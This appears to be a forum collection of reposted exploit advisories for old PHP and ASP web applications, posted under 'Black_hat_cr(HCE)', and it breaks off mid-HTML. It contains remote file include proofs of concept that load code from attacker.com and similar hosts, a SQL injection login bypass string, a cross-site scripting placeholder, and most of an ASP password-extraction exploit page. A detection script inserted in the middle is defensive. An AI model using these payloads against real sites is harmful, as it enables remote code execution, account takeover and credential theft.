version : 1.4 RC1
URL : http://www.agora.gouv.fr
Based on the free software Spip, Agora is free content-management software for the
Internet, developed in PHP, which makes it possible to set up and manage Internet,
intranet or extranet sites quickly and at lower cost.
-
Vulnerability:
~~~~~~~~~~~~~~
I found a vulnerability in modules/Mysqlfinder/MysqlfinderAdmin.php
-modules/Mysqlfinder/MysqlfinderAdmin.php -
PHP Code:
<?
include_once($_SESSION["PATH_COMPOSANT"]."Commun/Template.inc");
-
Input passed to the "$_SESSION["PATH_COMPOSANT"]" parameter in Mysqlfinder.php is not
properly verified before being used. This can be exploited to execute arbitrary PHP code
by including files from local or external resources.
Proof Of Concept:
~~~~~~~~~~~~~~~
PHP Code:
http://target.com/[agora-1.4-path]/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=http://attacker.com/inject.txt?
Black_hat_cr(HCE)
Aigaion <= 1.2.1 (DIR) Remote File Include Vulnerabilities
Code:
Software:Web based bibliography management system
Download link: http://sourceforge.net/projects/aigaion/
script:_basicfunctions.php
author: navairum
-
The script _basicfunctions.php does not specify a value for the $DIR variable
before including it.
Vulnerable code:
//if this script is not called from within one of the base pages, redirect to frontpage
require_once($DIR."checkBase.php");
/* This function leads the browser to the given location */
-
Exploit:
http://site/[PATH]/_basicfunctions.php?DIR=http://site/uhoh.txt?
http://site/path/pageactionauthor.php?DIR=http://site/uhoh.txt?
Black_hat_cr(HCE)
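A detection sketch for the two remote file include reports above (Agora's `_SESSION[PATH_COMPOSANT]` and Aigaion's `DIR`), added here as an example and not part of the original posts: it scans web-server access-log lines for query parameters that name a PHP superglobal or carry an absolute URL as their value. The log lines, paths, hosts and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# PHP superglobals: a request parameter with one of these names is an attempt
# to overwrite server-side state (it can succeed where register_globals is on).
SUPERGLOBALS = {"_SESSION", "_SERVER", "_GET", "_POST", "_COOKIE",
                "_FILES", "_ENV", "_REQUEST", "GLOBALS"}
URL_VALUE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (combined log format); hosts and paths are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /agora/modules/Mysqlfinder/'
    'MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=http://example.invalid/a.txt? '
    'HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2007:10:00:05 +0000] "GET /aigaion/_basicfunctions.php'
    '?DIR=http%3A%2F%2Fexample.invalid%2Fa.txt%3F HTTP/1.1" 200 498',
    '192.0.2.12 - - [01/Jan/2007:10:00:09 +0000] "GET /aigaion/index.php'
    '?page=authors&sort=name HTTP/1.1" 200 2048',
]

def inspect_request(target):
    """Return (reason, parameter) findings for one request target."""
    findings = []
    # parse_qsl percent-decodes names and values, so encoded attempts match too.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name.split("[", 1)[0] in SUPERGLOBALS:
            findings.append(("superglobal-overwrite", name))
        if URL_VALUE.match(value):
            findings.append(("url-in-parameter", name))
    return findings

def scan(lines):
    """Return (line_number, reason, parameter) for every finding in the log."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            hits.extend((number, reason, name)
                        for reason, name in inspect_request(match.group(1)))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A URL in a parameter is not proof of an include attempt, since redirect targets look the same, so treat `url-in-parameter` as a lead to check against the script's include logic.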
ASP Smiley 1.0 (default.asp) Login ByPass SQL Injection Vulnerability
Code:
*******************************************************************************
# Title : ASP Smiley v1.0 (default.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
Example:
###http://[target]/[path]/admin/
UserName: ' union select 0,0,0,0,0,0,0,0 from categories
Black_hat_cr(HCE)
ASPPlayground.NET Advanced Edition 2.4.5 Unicode Xss
script : ASPPlayground.NET Advanced Edition 2.4.5 Unicode
Xploit:
Code:
http://[site]/[forum_path]/calendar.asp?calendarID=|Xss|
black_hat_cr(HCE)
ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit
PHP Code:
<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>
<%
'===============================================================================================
'[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit
'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[ExploitName: exploit1.asp
'[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click
'[Using : Tr: Decrypt the retrieved password with the Perl script
'[Using : Tr: With the Turkish-language version of the script you cannot get the data with this exploit; you can pull it manually
'[Using : Tr: I don't think anyone is low enough to do that
'===============================================================================================
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke
%>
<html>
<title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title>
<head>
<script language="JavaScript">
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face="Verdana\" size=\"1\" color=\"#008000\">There is a problem The Data Didn\'t Take </font>'
}
}
function write(){
setTimeout("writetext()",1000);
}
</script>
</head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASP Portal <=</b>v4.0.0(default1.asp) <u><b>
Remote SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0"
style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"> <font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User